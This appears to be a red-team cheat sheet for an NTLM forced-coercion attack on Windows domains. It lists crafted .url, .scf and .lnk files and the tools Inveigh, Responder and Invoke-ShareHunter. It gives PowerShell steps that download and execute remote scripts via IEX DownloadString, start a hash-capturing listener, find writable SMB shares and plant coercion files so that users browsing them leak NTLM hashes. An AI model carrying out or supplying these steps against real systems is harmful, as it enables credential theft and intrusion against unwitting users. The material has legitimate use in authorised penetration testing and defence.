Forced Coersion Attack

Files to trigger the attack:

1) .url File: A shortcut file that contains a URL pointing to a remote server.

2) .scf File: A Shell Command File configured to initiate a connection to a remote server.

3) .lnk File: A Windows shortcut file crafted to point to a remote server.

Tools:

Inveigh https://github.com/Kevin-Robertson/Inveigh

Responder

Invoke-ShareHunter https://github.com/Leo4j/Invoke-ShareHunter (Optional)

Permissions: Local Administrator (Inveigh), Write permissions over an SMB share

Steps

1) Load Inveigh and configure listener

IEX (New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1")

2) Load Inveigh and set listener IP (Attack System)

Invoke-Inveigh -ConsoleOutput Y -HTTPS Y -IP 10.10.10.7

3) Load Invoke-ShareHunter

IEX (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ShareHunter/main/Invoke-ShareHunter.ps1')

4) Identify writeable shares within the domain

Invoke-ShareHunter -Domain security.local

5) Write NTLM coercion files to identified writeable shares

Invoke-URLFileAttack -WritableShares "C:\Users\StandardUser\Shares_Writable.txt"

6) Wait for user to browse to a share containing the crafted files and a NTLM hash is captured on the listener